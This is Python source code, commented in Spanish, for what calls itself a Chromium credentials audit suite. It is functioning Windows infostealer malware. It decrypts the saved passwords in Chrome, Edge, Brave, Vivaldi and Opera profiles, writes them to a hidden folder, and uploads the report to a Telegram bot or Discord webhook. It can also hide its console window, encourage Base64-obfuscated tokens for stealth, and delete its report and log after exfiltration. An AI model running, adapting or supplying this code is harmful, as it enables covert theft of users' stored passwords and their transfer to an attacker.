import os
import sys
import json
import html
import base64
import importlib
import sqlite3
import shutil
import csv
import ctypes
import logging
import argparse
import requests
from pathlib import Path
from datetime import datetime

# =========================================================================
# CREDENCIALES HARDCODED (Opcional - Úsalas en BASE64 para mayor sigilo)
# =========================================================================
# Tip: Convierte tus credenciales en Base64 con cualquier conversor online.
# =========================================================================
HARDCODED_TG_TOKEN   = ""  # Token del bot de Telegram      (B64 o Plano)
HARDCODED_TG_ID      = ""  # ID de destino: chat/grupo/canal (B64 o Plano)
HARDCODED_DS_WEBHOOK = ""  # URL del Webhook de Discord      (B64 o Plano)
# =========================================================================

if sys.platform != "win32":
    sys.exit(1)

def safe_b64_decode(val):
    """Intenta decodificar Base64 estricto. Si falla, devuelve el original intacto."""
    if not val:
        return ""
    try:
        return base64.b64decode(val, validate=True).decode('utf-8')
    except Exception:
        return val

try:
    win32crypt = importlib.import_module('win32crypt')
except ImportError:
    win32crypt = None

from Cryptodome.Cipher import AES

def _get_base_dir() -> Path:
    """Directorio del ejecutable/script. Compatible con PyInstaller (frozen)."""
    if getattr(sys, 'frozen', False):
        return Path(sys.executable).parent
    return Path(__file__).parent

def _setup_output_dir(preferred: Path) -> Path:
    """Crea la carpeta de salida oculta. Si el directorio no tiene permisos de escritura,
    usa APPDATA como fallback (compatible con C:\\Program Files\\ y rutas protegidas)."""
    for candidate in (preferred, Path(os.environ.get('APPDATA', os.getcwd())) / ".audit"):
        try:
            candidate.mkdir(exist_ok=True)
            # OR con atributos existentes para no destruir flags del sistema (SYSTEM, etc.)
            existing = ctypes.windll.kernel32.GetFileAttributesW(str(candidate))
            if existing != 0xFFFFFFFF:  # INVALID_FILE_ATTRIBUTES
                ctypes.windll.kernel32.SetFileAttributesW(str(candidate), existing | 0x2)
            return candidate
        except OSError:
            continue
    return preferred  # Último recurso: usar la ruta original aunque falle el ocultar

OUTPUT_DIR = _setup_output_dir(_get_base_dir() / ".audit")

_PID     = os.getpid()
LOG_FILE = OUTPUT_DIR / "pentest_audit.log"

_handlers = []
try:
    _handlers.append(logging.FileHandler(LOG_FILE, encoding='utf-8'))
except (PermissionError, OSError):
    pass  # Sin permisos de escritura: solo log en consola si está disponible
try:
    sys.stdout.fileno()
    _handlers.append(logging.StreamHandler(sys.stdout))
except (AttributeError, OSError):
    pass
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(levelname)s - %(message)s',
    handlers=_handlers
)
logger = logging.getLogger(__name__)

if win32crypt is None:
    logger.critical("pywin32 no instalado. Ejecuta: pip install pywin32")

HTML_TEMPLATE = """
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <title>Reporte de Auditoría Chromium</title>
    <style>
        body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background-color: #f4f7f6; color: #333; margin: 40px; }
        .container { background-color: #fff; padding: 20px; border-radius: 8px; box-shadow: 0 4px 8px rgba(0,0,0,0.1); }
        h1 { color: #2c3e50; border-bottom: 2px solid #3498db; padding-bottom: 10px; }
        table { width: 100%; border-collapse: collapse; margin-top: 20px; }
        th, td { padding: 12px; text-align: left; border-bottom: 1px solid #ddd; word-break: break-all; }
        th { background-color: #3498db; color: white; }
        tr:hover { background-color: #f1f1f1; }
        .browser-badge { padding: 4px 8px; border-radius: 4px; font-size: 0.85em; font-weight: bold; }
        .chrome { background-color: #ffeb3b; color: #333; }
        .edge { background-color: #03a9f4; color: white; }
        .brave { background-color: #ff5722; color: white; }
        .opera { background-color: #f44336; color: white; }
        .footer { margin-top: 20px; font-size: 0.9em; color: #777; text-align: center; }
        .skipped { color: #aaa; font-style: italic; }
    </style>
</head>
<body>
    <div class="container">
        <h1>Auditoría de Credenciales Chromium</h1>
        <p>Generado el: {{date}} | Total: {{total}} credenciales</p>
        <table>
            <thead>
                <tr>
                    <th>Navegador</th>
                    <th>Perfil</th>
                    <th>URL</th>
                    <th>Usuario</th>
                    <th>Contraseña</th>
                </tr>
            </thead>
            <tbody>
                {{rows}}
            </tbody>
        </table>
        <div class="footer">
            Suite de Auditoría Profesional - Uso bajo responsabilidad ética
            <span class="skipped">{{skipped_note}}</span>
        </div>
    </div>
</body>
</html>
"""

REQUEST_TIMEOUT = 10
VALID_URL_PREFIXES = ('http://', 'https://')


class Exfiltrator:
    def __init__(self, telegram_token=None, telegram_chat_id=None, discord_webhook=None):
        self.telegram_token   = telegram_token
        self.telegram_chat_id = telegram_chat_id
        self.discord_webhook  = discord_webhook

    def send_to_telegram(self, file_path):
        if not self.telegram_token or not self.telegram_chat_id:
            return False
        url = f"https://api.telegram.org/bot{self.telegram_token}/sendDocument"
        try:
            with open(file_path, 'rb') as f:
                response = requests.post(
                    url,
                    data={'chat_id': self.telegram_chat_id},
                    files={'document': f},
                    timeout=REQUEST_TIMEOUT
                )
            if response.status_code == 200:
                logger.info("Exfiltración vía Telegram exitosa.")
                return True
            logger.error(f"Telegram HTTP {response.status_code}: {response.text[:200]}")
        except requests.exceptions.Timeout:
            logger.error("Timeout: Telegram no respondió.")
        except Exception as e:
            logger.error(f"Falla Telegram: {e}")
        return False

    def send_to_discord(self, file_path):
        if not self.discord_webhook:
            return False
        try:
            with open(file_path, 'rb') as f:
                response = requests.post(
                    self.discord_webhook,
                    files={'file': f},
                    timeout=REQUEST_TIMEOUT
                )
            if response.status_code in (200, 204):
                logger.info("Exfiltración vía Discord exitosa.")
                return True
            logger.error(f"Discord HTTP {response.status_code}: {response.text[:200]}")
        except requests.exceptions.Timeout:
            logger.error("Timeout: Discord no respondió.")
        except Exception as e:
            logger.error(f"Falla Discord: {e}")
        return False


class ChromiumDecryptor:
    def __init__(self):
        self.local   = Path(os.environ.get('LOCALAPPDATA', ''))
        self.roaming = Path(os.environ.get('APPDATA', ''))
        self.browsers = {
            "Chrome":   self.local   / "Google/Chrome/User Data",
            "Edge":     self.local   / "Microsoft/Edge/User Data",
            "Brave":    self.local   / "BraveSoftware/Brave-Browser/User Data",
            "Vivaldi":  self.local   / "Vivaldi/User Data",
            "Opera":    self.roaming / "Opera Software/Opera Stable",
            "Opera GX": self.roaming / "Opera Software/Opera GX Stable",
        }

    def get_key(self, path):
        ls = path / "Local State"
        if not ls.exists():
            return None
        try:
            with open(ls, "r", encoding='utf-8') as f:
                config = json.load(f)
            key = base64.b64decode(config["os_crypt"]["encrypted_key"])[5:]
            return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] if win32crypt else None
        except Exception:
            return None

    def decrypt(self, blob, key):
        # 3 (prefijo v10) + 12 (nonce) + 1 (payload) + 16 (tag GCM) = 32 bytes mínimo
        if not isinstance(blob, (bytes, bytearray)) or len(blob) < 32:
            return "[Blob inválido]"
        try:
            cipher = AES.new(key, AES.MODE_GCM, blob[3:15])
            return cipher.decrypt(blob[15:-16]).decode()
        except Exception:
            return "[Error al descifrar]"

    def audit(self, fmt="html", out="audit_report"):
        data    = []
        skipped = 0

        for name, path in self.browsers.items():
            if not path.exists():
                continue
            key = self.get_key(path)
            if not key:
                continue
            try:
                profs = [p for p in path.iterdir()
                         if p.is_dir() and (p.name == "Default" or p.name.startswith("Profile"))]
            except PermissionError:
                logger.warning(f"Sin permisos para leer perfiles de {name}.")
                continue
            if not profs:
                profs = [path]

            for p in profs:
                db = p / "Login Data"
                if not db.exists():
                    continue
                tmp  = OUTPUT_DIR / f"tmp_audit_{_PID}.db"
                conn = None
                try:
                    shutil.copy2(db, tmp)
                    conn   = sqlite3.connect(tmp)
                    cursor = conn.cursor()
                    cursor.execute("SELECT action_url, username_value, password_value FROM logins")
                    for row in cursor.fetchall():
                        if not (row[0] and row[1] and row[2]):
                            continue
                        if not row[0].startswith(VALID_URL_PREFIXES):
                            skipped += 1
                            continue
                        data.append([name, p.name, row[0], row[1], self.decrypt(row[2], key)])
                    cursor.close()
                except Exception as e:
                    logger.warning(f"Error leyendo {name}/{p.name}: {e}")
                finally:
                    if conn:
                        conn.close()
                    tmp.unlink(missing_ok=True)

        if skipped:
            logger.info(f"{skipped} entradas descartadas (URLs no-http).")

        if not data:
            logger.info("No se encontraron credenciales.")
            return 0, None

        stamp     = datetime.now().strftime("%Y%m%d_%H%M%S")
        base_out  = OUTPUT_DIR / f"{out}.{fmt}"
        final_out = OUTPUT_DIR / f"{out}_{stamp}.{fmt}" if base_out.exists() else base_out
        if final_out != base_out:
            logger.info(f"Archivo existente. Guardando como: {final_out.name}")

        skipped_note = f" · {skipped} entradas no-http descartadas" if skipped else ""

        if fmt == "csv":
            with open(final_out, 'w', newline='', encoding='utf-8') as f:
                w = csv.writer(f)
                w.writerow(["Browser", "Profile", "URL", "User", "Pass"])
                w.writerows(data)

        elif fmt == "html":
            rows_html = ""
            for r in data:
                badge_class = r[0].lower().replace(' ', '-')
                rows_html += (
                    f"<tr><td><span class='browser-badge {badge_class}'>{html.escape(r[0])}</span></td>"
                    f"<td>{html.escape(r[1])}</td><td>{html.escape(r[2])}</td>"
                    f"<td>{html.escape(r[3])}</td><td>{html.escape(r[4])}</td></tr>"
                )
            # total y date se reemplazan ANTES que rows para evitar colisión con datos de usuario
            html_out = (HTML_TEMPLATE
                        .replace("{{total}}", str(len(data)))
                        .replace("{{date}}", stamp[:4] + "-" + stamp[4:6] + "-" + stamp[6:8]
                                 + " " + stamp[9:11] + ":" + stamp[11:13])
                        .replace("{{skipped_note}}", skipped_note)
                        .replace("{{rows}}", rows_html))
            with open(final_out, "w", encoding='utf-8') as f:
                f.write(html_out)

        logger.info(f"Reporte guardado en: {final_out}")
        return len(data), final_out


def _close_log_handler():
    """Cierra el FileHandler del root logger antes de borrar el archivo de log."""
    for handler in logging.root.handlers[:]:
        if isinstance(handler, logging.FileHandler):
            handler.close()
            logging.root.removeHandler(handler)


def main():
    parser = argparse.ArgumentParser(description="Chromium Credentials Auditor Suite")
    parser.add_argument("-f", "--format",  choices=["csv", "html"], default="html",
                        help="Formato de salida del reporte.")
    parser.add_argument("-o", "--output",  default="audit_report",
                        help="Nombre base del archivo de salida.")
    parser.add_argument("-t", "--telegram-token",  default=HARDCODED_TG_TOKEN,
                        help="Token del bot de Telegram (Plano o Base64).")
    parser.add_argument("-c", "--telegram-chatid", default=HARDCODED_TG_ID,
                        help="Chat ID personal de Telegram (Plano o Base64).")
    parser.add_argument("-d", "--discord", default=HARDCODED_DS_WEBHOOK,
                        help="URL del Webhook de Discord (Plano o Base64).")
    parser.add_argument("-s", "--stealth", action="store_true",
                        help="Modo sigiloso: oculta la ventana de consola (idéntico a .exe --noconsole).")
    parser.add_argument("--no-wipe", action="store_true",
                        help="Desactiva el auto-borrado del reporte tras exfiltración.")
    parser.add_argument("-v", "--verbose", action="store_true",
                        help="Muestra logs detallados de depuración en consola.")

    args = parser.parse_args()

    if args.stealth:
        hwnd = ctypes.windll.kernel32.GetConsoleWindow()
        if hwnd:
            ctypes.windll.user32.ShowWindow(hwnd, 0)  # SW_HIDE
        for handler in logging.root.handlers[:]:
            if isinstance(handler, logging.StreamHandler) and not isinstance(handler, logging.FileHandler):
                logging.root.removeHandler(handler)
        if args.verbose:
            logging.getLogger().setLevel(logging.DEBUG)  # bajar nivel ANTES de loggear
            logger.debug("Modo verbose activo en stealth; logs DEBUG → solo al archivo.")

    elif args.verbose:
        logging.getLogger().setLevel(logging.DEBUG)
        logger.debug("Modo verbose activado.")

    token   = safe_b64_decode(args.telegram_token)
    chatid  = safe_b64_decode(args.telegram_chatid)
    discord = safe_b64_decode(args.discord)

    logger.info("Iniciando Chromium Credentials Auditor Suite...")

    count, final_file = ChromiumDecryptor().audit(args.format, args.output)
    logger.info(f"Escaneo finalizado: {count} credenciales extraídas.")

    if count > 0 and final_file:
        exf = Exfiltrator(token, chatid, discord)
        if token and chatid:
            exf.send_to_telegram(final_file)
        if discord:
            exf.send_to_discord(final_file)

        if not args.no_wipe and (token or discord):
            Path(final_file).unlink(missing_ok=True)
            _close_log_handler()  # cerrar FileHandler ANTES de borrar el .log
            LOG_FILE.unlink(missing_ok=True)


if __name__ == "__main__":
    main()
